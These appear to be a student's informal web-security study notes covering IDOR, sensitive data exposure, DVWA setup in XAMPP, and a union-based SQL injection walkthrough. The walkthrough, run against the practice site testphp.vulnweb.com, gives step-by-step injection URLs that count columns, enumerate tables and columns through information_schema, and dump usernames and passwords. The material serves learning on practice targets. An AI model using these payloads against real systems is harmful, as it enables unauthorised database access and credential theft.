grapes

1. Insecure Direct Object Reference
2. Sensitive Data Exposure
3. DVWA set up and configuration
4. Union Based Sql Inection
5. _______________________________
6. Insecure Direct Object Reference
7.  
8. It is a vulnerability in which an attacker who is authorised to his/her own dash board is able to gain access to some other users account for
9. example
10. http://anywebsite.com/dashboard?user=someuser or id=12342
11. http://anywebsite.com/dashboard?user=randomuser or id=12348
12. if a hacker is a able to change assigned parameter by a website to some other parameter and gain access to the other users account then it is IDOR vulnerability
13. -> hacker can also change passwords
14. http://anywebsite.com/changepassword?user=someuser
15.  
16. why this attack occurs
17. ->deveoloper use direct references to restricted resources and application fails to verify wether the use is authorised on not.
18. ->improper check access
19.  
20. --->WAVE
21. ____________________________
22. Sensitive Data Exposure
23. Sensitive data exposure is a vulnerability that occurs when a hacker is able to gain access to sensitive data in motion or at rest or even at customer/users browser
24.  
25.  
26. eg 1
27. An application encrypts credit card numbers in a database using automatic database encryption. However, this means it also decrypts this data automatically when retrieved, allowing an SQL injection flaw to retrieve credit card numbers in clear text. The system should have encrypted the credit card numbers using a public key, and only allowed back-end applications to decrypt them with the private key.
28.  
29. eg 2
30. A site simply doesn’t use SSL for all authenticated pages. Attacker simply monitors network
31. traffic (like an open wireless network), and steals the user’s session cookie. Attacker then replays this cookie and hijacks the user’s session, accessing the user’s private data.
32.  
33. ________________________________________
34. DVWA set up and configuaration
35. install XAMPP
36.  
37. X->cross platform
38. A->Apache
39. M->Mysql
40. P->PHP
41. P->Perl
42.  
43. XAMPP-> It is a lightweight software distribution that makes it extremely easy for developer to create a local webserver for testing and deployment purposes
44.  
45. DVWA->Damn Vulnerable Web App
46. DVWA is a vulnerable app by default, budding security students can learn to attack and patch vulnerabilities from performin attacks on this application
47.  
48.  
49. ->unzip the file
50. ->Copy the folder and paste in C:\xampp\htdocs
51. ->open Xampp->start apache ->mysql
52. ->open the pasted folder "dvwa" in this case
53. ->navigate to the folder 'config'
54. ->open config.php file and leave password=""(blank)
55. ->open the browser and go to 127.0.0.1/dvwa
56. ->click on 'click to create a database'
57. __________________________________
58.  
59. Union SQl Injection
60. ->testphp.vulnweb.com
61.  
62. -> find a parameter
63. test wether it has an sql database or not
64. ->Check errors
65.  
66. http://testphp.vulnweb.com/listproducts.php?cat=1
67. http://testphp.vulnweb.com/listproducts.php?cat=1'
68.  
69. ->Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
70.  
71. ->http://testphp.vulnweb.com/listproducts.php?cat=1' order by 1--+
72. ->remove '
73. ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 1--+
74. ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 5--+
75. ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 7--+
76. ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 10--+
77. ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 11--+
78. ->http://testphp.vulnweb.com/listproducts.php?cat=1 order by 12--+
79. -> Error: Unknown column '12' in 'order clause' Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/listproducts.php on line 74
80. search art
81. -->Unknown column<--
82. --> know we know that we have
83. ->http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,7,8,9,10,11--+
84. ->we get vulnerable tables
85. 2,7,9
86.  
87.  
88. ->version()
89. ->database()
90. ->http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,table_name,8,9,10,11 from information_schema.tables--+
91. ->It will give us list of table name now we know which table to use/select
92. ->>"users"
93. ->now we need columns
94. ->>http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,column_name,8,9,10,11 from information_schema.columns where table_name="users"--+
95. ->now we know we have column names like-->>>>>>>>>>uname,pass,address,email,name
96. ->juicy info kha se mil sakta hen
97. ->uname,pass,address
98. ->so
99. ->
100. ->http://testphp.vulnweb.com/listproducts.php?cat=1 union select 1,2,3,4,5,6,group_concat(uname,':',pass),8,9,10,11 from users--+
101.  
102. -> and we get username and password
103.  
104.  
105.  
106.  
107.  
108. union-> union is an sql operator ,it's job is to combine the result of two or more select statement into a single result which is then returned as a part of HTTP response.
109.  
110. ->order by is used for sorting
111.  
112. ->Select->
113. A select query is a database object that shows information in Datasheet view
114.  
115. what is information schema?
116. ->
117. Information schema is a structure set which store metadata and other information about tabls,views,columns and procedures in a database
118.  
119. Database ki mummy